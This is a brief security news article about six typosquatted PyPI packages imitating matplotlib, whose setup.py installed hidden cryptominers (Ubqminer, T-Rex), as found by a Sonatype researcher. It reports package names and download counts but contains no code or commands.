Researchers found multiple packages in Python’s PyPI repository that turned developers’ workstations into cryptomining machines.
The packages were published by one same rogue account and tricked developers into downloading them with misspelled names of well-known projects. The infected packages have already been downloaded thousands of times.
Six packages containing malicious code were discovered in April, which infected the Python Package Index (PyPI): maratlib maratlib1 matplatlib-plus mllearnlib mplatlib learninglib.
All packages have been uploaded by user “nedog123” and are misspelled versions of the legitimate plotting software known as matplotlib.
A security researcher at Sonatype Ax Sharma, who researched this malicious activity, identified themaratlib package as a dependency that was used by the other malicious components:
“For each of these packages, the malicious code is contained in the setup.py file which is a build script that runs during a package’s installation,” the researcher writes in a blog post.
While analyzing the package, Sharma discovered that he tried to download a Bash script (aza2.sh) from a GitHub repository that is now no longer available. He was able to track the author’s aliases on GitHub and found that the script was used to run a cryptominer called “Ubqminer” that was secretly working on a compromised machine.
The researcher has revealed that the author of the malware used a different from default Kryptex wallet address to mine for Ubiq cryptocurrency.
In another variant, the script used an open-source T-Rex cryptomining program, Sharma noted.
Attackers are always targeting open-source code repositories like PyPI and NPM for NodeJS. Even if the download count is low, there still is a significant risk since developers may integrate the malicious code in other much more popular projects.
Since April, the packages have accumulated almost 5,000 downloads. The highest download count of 2,371 was recorded by the package “maratlib.”